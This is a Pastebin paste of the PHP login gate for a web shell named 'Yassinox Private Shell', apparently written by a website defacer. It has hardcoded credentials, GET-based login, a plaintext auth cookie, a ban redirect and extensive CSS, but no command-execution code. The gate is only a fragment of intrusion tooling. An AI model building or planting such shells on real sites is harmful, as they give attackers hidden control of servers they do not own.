Advertisement
YASSINOXTN

khalil

Mar 17th, 2015
507
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.98 KB | None | 0 0
  1. <?php
  2. //-------------[ Config ]-------------\\
  3. $username = "yassinox";
  4. $password = "defacer";
  5. //-------------[ Config ]-------------\\
  6. if ($_COOKIE['login'] != $username.":".$password) {
  7. if(!isset($_SESSION['log'])){
  8. if(!isset($_GET['username']) or empty($_GET['username']) or !isset($_GET['password']) or empty($_GET['password'])){
  9. if (!isset($_COOKIE["qsdqfsdfsdsdzeaze"])) {
  10. echo <<<loginform
  11. <!-- Login Form -->
  12. <title>Yassinox Private Shell</title>
  13. <!--
  14. Yassinox_Tn Private SHell V 0.2
  15. Bypass Many Functions
  16.  
  17.  
  18. __ __ _ _____
  19. \ \ / / (_) |_ _|
  20. \ V /__ _ ___ ___ _ _ __ _____ __ | |_ __
  21. \ // _` / __/ __| | '_ \ / _ \ \/ / | | '_ \
  22. | | (_| \__ \__ \ | | | | (_) > < | | | | |
  23. \_/\__,_|___/___/_|_| |_|\___/_/\_\ \_/_| |_|
  24. ______
  25. |______|
  26. -->
  27. <style>
  28. * { box-sizing: border-box; padding:0; margin: 0; }
  29.  
  30. body {
  31. font-family: "HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue",Helvetica,Arial,"Lucida Grande",sans-serif;
  32. color:white;
  33. font-size:12px;
  34. background:#1D1C1C ;
  35. }
  36.  
  37. form {
  38. background:#111;
  39. width:300px;
  40. margin:30px auto;
  41. border-radius:0.4em;
  42. border:1px solid #191919;
  43. overflow:hidden;
  44. position:relative;
  45. box-shadow: 0 5px 10px 5px rgba(0,0,0,0.2);
  46. }
  47.  
  48. form:after {
  49. content:"";
  50. display:block;
  51. position:absolute;
  52. height:1px;
  53. width:100px;
  54. left:20%;
  55. background:linear-gradient(left, #111, #444, #b6b6b8, #444, #111);
  56. top:0;
  57. }
  58.  
  59. form:before {
  60. content:"";
  61. display:block;
  62. position:absolute;
  63. width:8px;
  64. height:5px;
  65. border-radius:50%;
  66. left:34%;
  67. top:-7px;
  68. box-shadow: 0 0 6px 4px #fff;
  69. }
  70.  
  71. .inset {
  72. padding:20px;
  73. border-top:1px solid #19191a;
  74. }
  75.  
  76. form h1 {
  77. font-size:18px;
  78. text-shadow:0 1px 0 black;
  79. text-align:center;
  80. padding:15px 0;
  81. border-bottom:1px solid rgba(0,0,0,1);
  82. position:relative;
  83. }
  84.  
  85. form h1:after {
  86. content:"";
  87. display:block;
  88. width:250px;
  89. height:100px;
  90. position:absolute;
  91. top:0;
  92. left:50px;
  93. pointer-events:none;
  94. transform:rotate(70deg);
  95. -webkit-transform: rotate(70deg);
  96. background:linear-gradient(50deg, rgba(255,255,255,0.15), rgba(0,0,0,0));
  97. background-image: -webkit-linear-gradient(50deg, rgba(255,255,255,0.05), rgba(0,0,0,0)); /* For Safari */
  98.  
  99. }
  100.  
  101. label {
  102. color:#666;
  103. display:block;
  104. padding-bottom:9px;
  105. }
  106.  
  107. input[type=text],
  108. input[type=password] {
  109. width:100%;
  110. padding:8px 5px;
  111. background:linear-gradient(#1f2124, #27292c);
  112. border:1px solid #222;
  113. box-shadow:
  114. 0 1px 0 rgba(255,255,255,0.1);
  115. border-radius:0.3em;
  116. margin-bottom:20px;
  117. }
  118.  
  119. label[for=remember]{
  120. color:white;
  121. display:inline-block;
  122. padding-bottom:0;
  123. padding-top:5px;
  124. }
  125.  
  126. input[type=checkbox] {
  127. display:inline-block;
  128. vertical-align:top;
  129. }
  130.  
  131. .p-container {
  132. padding:0 20px 20px 20px;
  133. }
  134.  
  135. .p-container:after {
  136. clear:both;
  137. display:table;
  138. content:"";
  139. }
  140.  
  141. .p-container span {
  142. display:block;
  143. float:left;
  144. color:#0d93ff;
  145. padding-top:8px;
  146. }
  147.  
  148. input[type=submit] {
  149. padding:5px 20px;
  150. border:1px solid rgba(0,0,0,0.4);
  151. text-shadow:0 -1px 0 rgba(0,0,0,0.4);
  152. box-shadow:
  153. inset 0 1px 0 rgba(255,255,255,0.3),
  154. inset 0 10px 10px rgba(255,255,255,0.1);
  155. border-radius:0.3em;
  156. background:#27292c;
  157. color:white;
  158. float:right;
  159. font-weight:bold;
  160. cursor:pointer;
  161. font-size:13px;
  162. }
  163.  
  164. input[type=submit]:hover {
  165. box-shadow:
  166. inset 0 1px 0 rgba(255,255,255,0.3),
  167. inset 0 -10px 10px rgba(255,255,255,0.1);
  168. }
  169.  
  170. input[type=text]:hover,
  171. input[type=password]:hover,
  172. label:hover ~ input[type=text],
  173. label:hover ~ input[type=password] {
  174. background:#27292c;
  175. }
  176. </style>
  177. <br><br><br><br><br><br><br><br><br>
  178. <form method="get" action="">
  179. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="http://www11.0zz0.com/2014/08/23/06/983187840.png">
  180. <div class="inset">
  181. <p>
  182. <label for="username">USERNAME</label>
  183. <input type="text" name="username" id="username">
  184. </p>
  185. <p>
  186. <label for="password">PASSWORD</label>
  187. <input type="password" name="password" id="password">
  188. </p>
  189. </div>
  190. <p class="p-container">
  191. <input type="submit" name="go" id="go" value="Log in">
  192. </p>
  193. </form>
  194. loginform;
  195. }else {
  196. echo '
  197. <style>
  198. <style>
  199. * { box-sizing: border-box; padding:0; margin: 0; }
  200.  
  201. body {
  202. font-family: "HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue",Helvetica,Arial,"Lucida Grande",sans-serif;
  203. color:white;
  204. font-size:12px;
  205. background:#1D1C1C ;
  206. }
  207.  
  208. form {
  209. background:#111;
  210. width:300px;
  211. margin:30px auto;
  212. border-radius:0.4em;
  213. border:1px solid #191919;
  214. overflow:hidden;
  215. position:relative;
  216. box-shadow: 0 5px 10px 5px rgba(0,0,0,0.2);
  217. }
  218.  
  219. form:after {
  220. content:"";
  221. display:block;
  222. position:absolute;
  223. height:1px;
  224. width:100px;
  225. left:20%;
  226. background:linear-gradient(left, #111, #444, #b6b6b8, #444, #111);
  227. top:0;
  228. }
  229.  
  230. form:before {
  231. content:"";
  232. display:block;
  233. position:absolute;
  234. width:8px;
  235. height:5px;
  236. border-radius:50%;
  237. left:34%;
  238. top:-7px;
  239. box-shadow: 0 0 6px 4px #fff;
  240. }
  241.  
  242. .inset {
  243. padding:20px;
  244. border-top:1px solid #19191a;
  245. }
  246.  
  247. form h1 {
  248. font-size:18px;
  249. text-shadow:0 1px 0 black;
  250. text-align:center;
  251. padding:15px 0;
  252. border-bottom:1px solid rgba(0,0,0,1);
  253. position:relative;
  254. }
  255.  
  256. form h1:after {
  257. content:"";
  258. display:block;
  259. width:250px;
  260. height:100px;
  261. position:absolute;
  262. top:0;
  263. left:50px;
  264. pointer-events:none;
  265. transform:rotate(70deg);
  266. -webkit-transform: rotate(70deg);
  267. background:linear-gradient(50deg, rgba(255,255,255,0.15), rgba(0,0,0,0));
  268. background-image: -webkit-linear-gradient(50deg, rgba(255,255,255,0.05), rgba(0,0,0,0)); /* For Safari */
  269.  
  270. }
  271.  
  272. label {
  273. color:#666;
  274. display:block;
  275. padding-bottom:9px;
  276. }
  277.  
  278. input[type=text],
  279. input[type=password] {
  280. width:100%;
  281. padding:8px 5px;
  282. background:linear-gradient(#1f2124, #27292c);
  283. border:1px solid #222;
  284. box-shadow:
  285. 0 1px 0 rgba(255,255,255,0.1);
  286. border-radius:0.3em;
  287. margin-bottom:20px;
  288. }
  289.  
  290. label[for=remember]{
  291. color:white;
  292. display:inline-block;
  293. padding-bottom:0;
  294. padding-top:5px;
  295. }
  296.  
  297. input[type=checkbox] {
  298. display:inline-block;
  299. vertical-align:top;
  300. }
  301.  
  302. .p-container {
  303. padding:0 20px 20px 20px;
  304. }
  305.  
  306. .p-container:after {
  307. clear:both;
  308. display:table;
  309. content:"";
  310. }
  311.  
  312. .p-container span {
  313. display:block;
  314. float:left;
  315. color:#0d93ff;
  316. padding-top:8px;
  317. }
  318.  
  319. input[type=submit] {
  320. padding:5px 20px;
  321. border:1px solid rgba(0,0,0,0.4);
  322. text-shadow:0 -1px 0 rgba(0,0,0,0.4);
  323. box-shadow:
  324. inset 0 1px 0 rgba(255,255,255,0.3),
  325. inset 0 10px 10px rgba(255,255,255,0.1);
  326. border-radius:0.3em;
  327. background:#27292c;
  328. color:white;
  329. float:right;
  330. font-weight:bold;
  331. cursor:pointer;
  332. font-size:13px;
  333. }
  334.  
  335. input[type=submit]:hover {
  336. box-shadow:
  337. inset 0 1px 0 rgba(255,255,255,0.3),
  338. inset 0 -10px 10px rgba(255,255,255,0.1);
  339. }
  340.  
  341. input[type=text]:hover,
  342. input[type=password]:hover,
  343. label:hover ~ input[type=text],
  344. label:hover ~ input[type=password] {
  345. background:#27292c;
  346. }
  347. </style>
  348. <br><br><br><br><br><br><br>
  349. <center><img src="http://www.businesszone.co.uk/files/siftmedia-businesszone/images/BANNED-logo.png"></center>';
  350. }
  351. exit();
  352. }else{
  353. if($_GET['username'] == $username and $_GET['password'] == $password ){
  354. $_SESSION['log'] = 1;
  355. setcookie("login", $username.":".$password);
  356. header('Location: ?page=home');
  357. exit();
  358. }else{
  359. setcookie("qsdqfsdfsdsdzeaze", "khqsdgbqjshqsqsdqssdfs");
  360. header('Location: ?banned');
  361. exit();
  362.  
  363. }
  364. }
  365. }
  366. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement